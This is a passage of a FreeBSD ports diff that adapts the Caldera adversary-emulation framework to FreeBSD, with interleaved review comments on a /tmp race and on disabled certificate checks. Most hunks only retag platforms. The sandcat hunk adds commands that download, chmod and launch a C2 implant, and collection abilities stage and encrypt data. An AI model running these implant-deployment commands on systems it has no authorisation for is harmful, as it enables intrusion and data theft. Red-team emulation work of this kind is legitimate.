++ - source: file.sensitive.hash diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml new file mode 100644 index 000000000000..bb5c268f119d --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml 
@@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: True + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + directory="#{directory.sensitive.path}"; +@@ -68,4 +68,4 @@ + edge: has_hash + target: directory.sensitive.hash + - plugins.stockpile.app.requirements.paw_provenance: +- - source: directory.sensitive.hash +\ No newline at end of file ++ - source: directory.sensitive.hash diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml new file mode 100644 index 000000000000..04e09ebbabbd --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml +@@ -8,7 +8,7 @@ + name: x + repeatable: True + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + set -f; diff --git a/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml new file mode 100644 index 000000000000..9c0b12919fb9 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml 
@@ -0,0 +1,11 @@
+--- plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml.orig 2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml
+@@ -28,7 +28,7 @@
+ - source: host.process.guid
+ edge: has_interesting
+ target: investigate.process.guid
+- linux:
++ freebsd,linux:
+ elasticsearch:
+ *cmd
+ darwin:
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml
new file mode 100644
index 000000000000..1fa277437813
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml
@@ -0,0 +1,11 @@
+--- plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml.orig 2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml
+@@ -25,7 +25,7 @@
+ - source: host.process.guid
+ edge: has_interesting
+ target: investigate.process.parent_guid
+- linux:
++ freebsd,linux:
+ elasticsearch:
+ *cmd
+ darwin:
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml
new file mode 100644
index 000000000000..2879ff2bff30
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml
@@ -0,0 +1,11 @@
+--- plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml.orig 2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml
+@@ -22,7 +22,7 @@
+ - source: host.process.guid
+ edge: has_interesting
+ target: investigate.process.guid
+- linux:
++ freebsd,linux:
+ elasticsearch:
+ *cmd
+ darwin:
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml
new file mode 100644
index 000000000000..85edefaa30f9
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml.orig 2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml
+@@ -8,7 +8,7 @@
+ attack_id: x
+ name: x
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ kill -9 #{host.pid.unauthorized}
+@@ -25,4 +25,4 @@
+ taskkill /pid #{host.pid.unauthorized} /f
+ requirements:
+ - plugins.stockpile.app.requirements.paw_provenance:
+- - source: host.pid.unauthorized
+\ No newline at end of file
++ - source: host.pid.unauthorized
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml
new file mode 100644
index 000000000000..e28abe22f8d4
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml.orig 2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml
+@@ -7,7 +7,7 @@
+ attack_id: x
+ name: x
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ if ! test -f hosts_backup; then cp /etc/hosts hosts_backup; fi;
+@@ -27,4 +27,4 @@
+ if (-not (Test-Path -Path .\hosts_backup)) { Copy-Item -Path c:\windows\system32\drivers\etc\hosts -Destination .\hosts_backup; };
+ Add-Content c:\windows\system32\drivers\etc\hosts "127.0.0.1`t#{remote.suspicious.url}";
+ cleanup: |
+- Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force
+\ No newline at end of file
++ Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml new file mode 100644 index 000000000000..26f61e8f83cd --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml +@@ -7,7 +7,7 @@ + attack_id: x + name: x + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + crontab -u #{host.user.name} -l > temp_crontab; +@@ -35,4 +35,4 @@ + edge: has_new_cronjob + target: host.new.cronjob + - plugins.stockpile.app.requirements.paw_provenance: +- - source: host.new.cronjob +\ No newline at end of file ++ - source: host.new.cronjob diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml new file mode 100644 index 000000000000..72c7f5fec0b7 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml 
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml.orig 2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml
+@@ -7,7 +7,7 @@
+ name: x
+ repeatable: False
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ directory="#{directory.sensitive.path}";
+@@ -40,4 +40,4 @@
+ - plugins.stockpile.app.requirements.paw_provenance:
+ - source: directory.sensitive.backup
+ - plugins.stockpile.app.requirements.paw_provenance:
+- - source: directory.sensitive.path
+\ No newline at end of file
++ - source: directory.sensitive.path
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml
new file mode 100644
index 000000000000..f87d3e750316
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml.orig 2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml
+@@ -7,7 +7,7 @@
+ name: x
+ repeatable: False
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ cp -f /tmp/sensitive_file_backups/#{file.backup.name} #{file.sensitive.path}
+@@ -31,4 +31,4 @@
+ - plugins.stockpile.app.requirements.paw_provenance:
+ - source: file.backup.name
+ - plugins.stockpile.app.requirements.paw_provenance:
+- - source: file.sensitive.path
+\ No newline at end of file
++ - source: file.sensitive.path
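Review bot: The restore source on the first command line of e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml, `/tmp/sensitive_file_backups/`, is a fixed name under a world-writable directory, and extending the entry to `freebsd,linux:` carries that over unchanged. The setup abilities patched later in this commit (243053d2, 34bc0116, 622e4bda, df9d2b83) create it with `mkdir -p /tmp/sensitive_file_backups;`, which also succeeds when the directory already exists, so on a multi-user host another local account could own the directory and decide what `cp -f` writes into `#{file.sensitive.path}`. No ownership or mode check is visible, though each command body continues outside its hunk. I would have the setup step create the directory with a restricted mode and stop if it is already there, along the lines of `mkdir -m 700 /tmp/sensitive_file_backups || exit 1;`, or keep the backups outside /tmp; the setup abilities share the directory, so the check may need to be on ownership rather than existence.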
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml new file mode 100644 index 000000000000..fb7e82cf61c0 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + mkdir -p /tmp/sensitive_file_backups; diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml new file mode 100644 index 000000000000..fa5a362e9b9e --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + output=""; +@@ -87,4 +87,4 @@ + } + requirements: + - plugins.response.app.requirements.source_fact: +- - source: directory.sensitive.path +\ No newline at end of file ++ - source: directory.sensitive.path 
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml new file mode 100644 index 000000000000..966f5dfa6125 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + mkdir -p /tmp/sensitive_file_backups; +@@ -67,4 +67,4 @@ + Remove-Item -Recurse -Force C:\Users\Public\sensitive_file_backups; + requirements: + - plugins.response.app.requirements.source_fact: +- - source: file.sensitive.path +\ No newline at end of file ++ - source: file.sensitive.path diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml new file mode 100644 index 000000000000..fac4b766aaa3 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + mkdir -p /tmp/sensitive_file_backups; +@@ -104,4 +104,4 @@ + then rm -f $file; + fi; + done; +- rm -rf /tmp/sensitive_file_backups; +\ No newline at end of file ++ rm -rf /tmp/sensitive_file_backups; 
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml new file mode 100644 index 000000000000..5d580c3b3239 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/setup/ba907d7a-b334-47e7-b652-4e481b5aa534.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/ba907d7a-b334-47e7-b652-4e481b5aa534.yml +@@ -7,7 +7,7 @@ + attack_id: x + name: x + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + echo '' > /tmp/cron_jobs; +@@ -32,4 +32,4 @@ + cat /tmp/cron_jobs | sort > /tmp/baseline_cronjobs_list.txt; + rm /tmp/cron_jobs; + cleanup: | +- rm -f /tmp/baseline_cronjobs_list.txt +\ No newline at end of file ++ rm -f /tmp/baseline_cronjobs_list.txt diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_df9d2b83-b40f-4167-af75-31ddde59af7e.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_df9d2b83-b40f-4167-af75-31ddde59af7e.yml new file mode 100644 index 000000000000..372ec13b4851 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_df9d2b83-b40f-4167-af75-31ddde59af7e.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/setup/df9d2b83-b40f-4167-af75-31ddde59af7e.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/df9d2b83-b40f-4167-af75-31ddde59af7e.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + mkdir -p /tmp/sensitive_file_backups; +@@ -100,4 +100,4 @@ + do if [ ! -s $file ]; + then rm -f $file; + fi; +- done; +\ No newline at end of file ++ done; 
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_f313a0d7-2327-4f69-8da4-a6efd6135121.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_f313a0d7-2327-4f69-8da4-a6efd6135121.yml new file mode 100644 index 000000000000..c6a553602a4a --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_f313a0d7-2327-4f69-8da4-a6efd6135121.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/setup/f313a0d7-2327-4f69-8da4-a6efd6135121.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/f313a0d7-2327-4f69-8da4-a6efd6135121.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + output=""; diff --git a/security/caldera/files/patch-plugins_sandcat_app_sand__svc.py b/security/caldera/files/patch-plugins_sandcat_app_sand__svc.py new file mode 100644 index 000000000000..78a4a9429abf --- /dev/null +++ b/security/caldera/files/patch-plugins_sandcat_app_sand__svc.py @@ -0,0 +1,14 @@ +--- plugins/sandcat/app/sand_svc.py.orig 2022-07-20 19:48:00 UTC ++++ plugins/sandcat/app/sand_svc.py +@@ -56,7 +56,10 @@ class SandService(BaseService): + ), + linux=dict( + cflags='CGO_ENABLED=1' +- ) ++ ), ++ freebsd=dict( ++ cflags='CGO_ENABLED=1' ++ ), + ) + if which('go') is not None: + if platform in compile_options.keys(): diff --git a/security/caldera/files/patch-plugins_sandcat_data_abilities_command-and-control_2f34977d-9558-4c12-abad-349716777c6b.yml b/security/caldera/files/patch-plugins_sandcat_data_abilities_command-and-control_2f34977d-9558-4c12-abad-349716777c6b.yml new file mode 100644 index 000000000000..051959d4ca5c --- /dev/null +++ b/security/caldera/files/patch-plugins_sandcat_data_abilities_command-and-control_2f34977d-9558-4c12-abad-349716777c6b.yml 
@@ -0,0 +1,45 @@ +--- plugins/sandcat/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml.orig 2022-07-20 19:48:00 UTC ++++ plugins/sandcat/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml +@@ -80,6 +80,42 @@ + curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name}; + chmod +x #{agents.implant_name}; + ./#{agents.implant_name} -server $server -listenP2P -v ++ freebsd: ++ sh: ++ command: | ++ server="#{app.contact.http}"; ++ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" $server/file/download > #{agents.implant_name}; ++ chmod +x #{agents.implant_name}; ++ ./#{agents.implant_name} -server $server -group red -v ++ variations: ++ - description: Deploy as a blue-team agent instead of red ++ command: | ++ server="#{app.contact.http}"; ++ agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; ++ nohup ./$agent -server $server -group blue & ++ - description: Download with a random name and start as a background process ++ command: | ++ server="#{app.contact.http}"; ++ agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; ++ nohup ./$agent -server $server & ++ - description: Compile red-team agent with a comma-separated list of extensions (requires GoLang). 
++ command: | ++ server="#{app.contact.http}"; ++ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name}; ++ chmod +x #{agents.implant_name}; ++ ./#{agents.implant_name} -server $server -group red -v ++ - description: Download with GIST C2 ++ command: | ++ server="#{app.contact.http}"; ++ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > #{agents.implant_name}; ++ chmod +x #{agents.implant_name}; ++ ./#{agents.implant_name} -c2 GIST -v ++ - description: Deploy as a P2P agent with known peers included in compiled agent ++ command: | ++ server="#{app.contact.http}"; ++ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name}; ++ chmod +x #{agents.implant_name}; ++ ./#{agents.implant_name} -server $server -listenP2P -v + windows: + psh: + command: | diff --git a/security/caldera/files/patch-plugins_sandcat_update-agents.sh b/security/caldera/files/patch-plugins_sandcat_update-agents.sh new file mode 100644 index 000000000000..1d3129337293 --- /dev/null +++ b/security/caldera/files/patch-plugins_sandcat_update-agents.sh @@ -0,0 +1,16 @@ +--- plugins/sandcat/update-agents.sh.orig 2022-07-20 19:48:00 UTC ++++ plugins/sandcat/update-agents.sh +@@ -1,10 +1,11 @@ +-#!/bin/bash ++#!/bin/sh + # generates payloads for each os + +-function build() { ++build() { + GOOS=windows go build -o ../payloads/sandcat.go-windows -ldflags="-s -w" sandcat.go + GOOS=linux go build -o ../payloads/sandcat.go-linux -ldflags="-s -w" sandcat.go + GOOS=darwin go build -o ../payloads/sandcat.go-darwin -ldflags="-s -w" sandcat.go ++GOOS=freebsd go build -o ../payloads/sandcat.go-freebsd -ldflags="-s -w" sandcat.go + } + cd gocat && build + cd .. 
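Review bot: In the sandcat ability 2f34977d-9558-4c12-abad-349716777c6b.yml, the two added `freebsd` variations that fetch the agent with `curl -svkOJ` turn off certificate verification (`-k`) for a binary that is made executable and started on the following line. When the server is reached over HTTPS, the host then has no assurance that the file it runs is the one the server built. If `-k` is there only for self-signed lab certificates I would say so in the variation's `description`, and otherwise use `curl -svOJ`. The added block also appears to be a copy of the existing linux entry with only the `platform:` header changed, so it has to be kept in step with upstream by hand.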
diff --git a/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__basic.py b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__basic.py new file mode 100644 index 000000000000..2b4e23a8b9a4 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__basic.py @@ -0,0 +1,12 @@ +--- plugins/stockpile/app/obfuscators/base64_basic.py.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/app/obfuscators/base64_basic.py +@@ -10,7 +10,8 @@ class Obfuscation(BaseObfuscator): + return dict( + windows=['psh'], + darwin=['sh'], +- linux=['sh'] ++ linux=['sh'], ++ freebsd=['sh'] + ) + + """ EXECUTORS """ diff --git a/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__jumble.py b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__jumble.py new file mode 100644 index 000000000000..281c9eecfc2a --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__jumble.py @@ -0,0 +1,12 @@ +--- plugins/stockpile/app/obfuscators/base64_jumble.py.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/app/obfuscators/base64_jumble.py +@@ -14,7 +14,8 @@ class Obfuscation(BaseObfuscator): + return dict( + windows=['psh'], + darwin=['sh'], +- linux=['sh'] ++ linux=['sh'], ++ freebsd=['sh'] + ) + + def run(self, link, **kwargs): diff --git a/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__no__padding.py b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__no__padding.py new file mode 100644 index 000000000000..f74f3385ccad --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__no__padding.py 
@@ -0,0 +1,12 @@ +--- plugins/stockpile/app/obfuscators/base64_no_padding.py.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/app/obfuscators/base64_no_padding.py +@@ -8,7 +8,8 @@ class Obfuscation(BaseObfuscator): + return dict( + windows=['psh'], + darwin=['sh'], +- linux=['sh'] ++ linux=['sh'], ++ freebsd=['sh'] + ) + + def run(self, link, **kwargs): diff --git a/security/caldera/files/patch-plugins_stockpile_app_obfuscators_caesar__cipher.py b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_caesar__cipher.py new file mode 100644 index 000000000000..2d448ea635d0 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_caesar__cipher.py @@ -0,0 +1,12 @@ +--- plugins/stockpile/app/obfuscators/caesar_cipher.py.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/app/obfuscators/caesar_cipher.py +@@ -10,7 +10,8 @@ class Obfuscation(BaseObfuscator): + return dict( + windows=['psh'], + darwin=['sh'], +- linux=['sh'] ++ linux=['sh'], ++ freebsd=['sh'] + ) + + """ EXECUTORS """ diff --git a/security/caldera/files/patch-plugins_stockpile_app_obfuscators_steganography.py b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_steganography.py new file mode 100644 index 000000000000..38c1030761f3 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_steganography.py @@ -0,0 +1,12 @@ +--- plugins/stockpile/app/obfuscators/steganography.py.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/app/obfuscators/steganography.py +@@ -14,7 +14,8 @@ class Obfuscation(BaseObfuscator): + def supported_platforms(self): + return dict( + darwin=['sh'], +- linux=['sh'] ++ linux=['sh'], ++ freebsd=['sh'] + ) + + """ EXECUTORS """ 
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_02de522f-7e0a-4544-8afc-0c195f400f5f.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_02de522f-7e0a-4544-8afc-0c195f400f5f.yml new file mode 100644 index 000000000000..06f0a024d805 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_02de522f-7e0a-4544-8afc-0c195f400f5f.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml +@@ -15,7 +15,7 @@ + parsers: + plugins.stockpile.app.parsers.ssh: + - source: remote.ssh.cmd +- linux: ++ freebsd,linux: + sh: + command: | + pip install -q stormssh 2> /dev/null && storm list | sed 's/\x1b\[[0-9;]*m//g' diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_10fad81e-3f68-47be-83b6-fbee7711c6a9.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_10fad81e-3f68-47be-83b6-fbee7711c6a9.yml new file mode 100644 index 000000000000..1d2d2ed87474 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_10fad81e-3f68-47be-83b6-fbee7711c6a9.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml +@@ -33,7 +33,7 @@ + parsers: + plugins.stockpile.app.parsers.basic: + - source: host.dir.staged +- linux: ++ freebsd,linux: + sh: + command: | + chmod +x ./file_search.sh; ./file_search.sh --extensions '#{linux.included.extensions}' 
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_30a8cf10-73dc-497c-8261-a64cc9e91505.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_30a8cf10-73dc-497c-8261-a64cc9e91505.yml new file mode 100644 index 000000000000..08bc5028608a --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_30a8cf10-73dc-497c-8261-a64cc9e91505.yml @@ -0,0 +1,18 @@ +--- plugins/stockpile/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml +@@ -8,7 +8,7 @@ + attack_id: T1560.001 + name: "Archive Collected Data: Archive via Utility" + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg +@@ -29,4 +29,4 @@ + - source: host.dir.compress + requirements: + - plugins.stockpile.app.requirements.paw_provenance: +- - source: host.dir.staged +\ No newline at end of file ++ - source: host.dir.staged diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_4e97e699-93d7-4040-b5a3-2e906a58199e.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_4e97e699-93d7-4040-b5a3-2e906a58199e.yml new file mode 100644 index 000000000000..f93fa21c439d --- /dev/null +++ 